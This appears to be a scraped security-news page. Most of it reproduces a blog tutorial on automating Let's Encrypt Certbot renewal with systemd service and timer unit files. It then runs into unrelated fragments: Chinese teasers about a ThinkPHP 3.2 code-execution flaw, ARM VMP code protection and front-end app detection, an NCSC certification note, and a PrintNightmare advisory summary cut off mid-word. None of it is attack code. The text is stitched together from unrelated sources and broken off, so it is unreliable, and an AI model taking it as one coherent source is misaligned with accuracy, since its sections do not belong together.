2021.7.12 18:43

“职”为你来！

K4YT3X https://k4yt3x.com/automatically-renew-certbot-certificates-with-systemd-timers/ -

It could be tiresome to have to manually renew your Let’s Encrypt certificates using Certbot on your VPSs every few months. This gets increasingly frustrating as you have more services and thus, more certificates to renew. Having to renew them manually is also quite detrimental to the scalability of your services and infrastructure. Therefore, there emerges a need to enable the certificates to self-renew. This article will introduce a relatively new way to perform automatic certificate renewal with systemd timers instead of traditional ways such as crontab.

Why? Because on a system with systemd, it is easier to have everything managed through systemd.

In order to achieve auto-renewal of certificates, we will need to write two systemd unit files: a service unit which defines what to execute, and a timer which defines when to execute.

Writing a Service Unit

In simple terms, the systemd service file defines the commands to be executed for the certificate renewal. You can think of it to be similar to a script. Here are some noteworthy points:

• Type=oneshot: This option makes the service unit behave more like a script. The unit will not become a daemon, and you can define multiple ExecStart entries which will execute in serial. If any of the entries fail, the unit is considered failed.
• The first ExecStart: Launches Certbot in -n (non-interactive) mode to renew the certificates. More arguments can be added as needed.
• The second ExecStart: Optional. Certbot needs to listen on port 80 for web-based authentication. Since port 80 is a privileged port, Certbot needs to run with root privileges. However, this means that the certificates saved will be owned by root:root. This second command yields the ownership of the certificates. You can modify this command as needed.
• The third ExecStart: Restart the service(s) using the expiring certificates so they can load in the refreshed certificate. reload might also be supported by some services as a more graceful version than restart.

This example below is written for one of my matrix-synapse servers. Since Certbot requires root privileges to listen on port 80 to renew the certificates, the renewed certificates it releases into /etc/letsencrypt are also owned by root:root. My coarse solution for this problem is to simply use a chown command to yield the ownership of the needed directories to the service’s group ssl-cert per the conventions. The user matrix-synapse is a member of the ssl-cert group, which gives it access to the certificates and keys.

Of course, should you have multiple services running on the same server or just wish to have more fine-grained permissions, you can always design a more intricate chown command or seek an alternative solution for the permissions. I am merely demonstrating the bare minimums here.

Another thing worth mentioning is that if you have Certbot installed via pip (not that you should) instead of a package manager, Certbot will be at /usr/local/bin/certbot instead of /usr/bin/certbot.

1 2 3 4 5 6 7 8 9 10 11 12 13 [Unit] Description=Renew Certbot certificates Wants=certbot-renew.timer [Service] Type=oneshot WorkingDirectory=/etc/letsencrypt ExecStart=/usr/bin/certbot renew --standalone -n ExecStart=/usr/bin/chown root:ssl-cert -R /etc/letsencrypt/archive /etc/letsencrypt/live ExecStart=/usr/bin/systemctl restart matrix-synapse [Install] WantedBy=multi-user.target

Unit file: /etc/systemd/system/certbot-renew.service

Writing a Timer Unit

The timer file controls when/how often the service file is executed.

• OnCalendar=daily: Denotes that the service file above should be executed on a daily basis.
• Persistent=true: The last time the timer is ran is stored on disk. If for whatever reason (e.g, power-off) the timer was not executed on-time, it will be executed immediately when the timer is next loaded.

1 2 3 4 5 6 7 8 9 [Unit] Description=Daily Certbot renew [Timer] OnCalendar=daily Persistent=true [Install] WantedBy=timers.target

Unit file: /etc/systemd/system/certbot-renew.timer

- https://k4yt3x.com/automatically-renew-certbot-certificates-with-systemd-timers/ - 2019-2024 K4YT3X. All rights reserved.

近日，默安玄甲实验室发现网络上出现针对ThinkPHP3.2的远程代码执行漏洞。随即做出了分析和协助客户响应漏洞，防止在野利用的漏洞造成威胁。

目录 一、ARM VMP简介 二、框架设计 三、文件分析反汇编 四、Opcode指令解析与VMCode生成 五、增加节区与入口点 六、VMP引擎 七、总结 一、ARM VMP简介 ARM VMP是这几年颇为流行的移动端代码指令保护技术，该技术方案大规模应用到软件保护领域最早在PC时代源于俄罗斯的著名

随着移动端安全开发的升级，移动应用的安全越来越被重视，在PC时代用到的VMP方案也被成功应用到移动端的加固产品中来。

0x01 背景介绍同往日在那个夜高风黑，吃瓜冲浪的晚上，看到了一篇前端识别用户安装了哪些应用文章，奈何当晚精神不佳，阔乐见底，草草收藏关灯睡觉。今日绵绵细雨，无所事事，逛逛收藏，想起此事，遂灌满...

与业界先行者相比，我们数据面板、剧本等平台功能方面仍有一些差距，未来也会持续建设

'Risk Management' is the first certifiable specialism under the NCSC's revised CCP scheme.

Summary CERT/CC has issued a vulnerability note addressing a Microsoft Print Spooler Remote Code Execution flaw. Functional exploit code has been made available for this vulnerability. Threat Type Vulnerability Overview ***UPDATE July 7, 2021*** Microsoft has issued a patch as of Tuesday, July 6, 2021. KB5005010 addresses the remote code execution exploit. Microsoft is urging customers to immediately install the patch. The update also recommends configuring RestrictDriverInstallationToAdministrators registr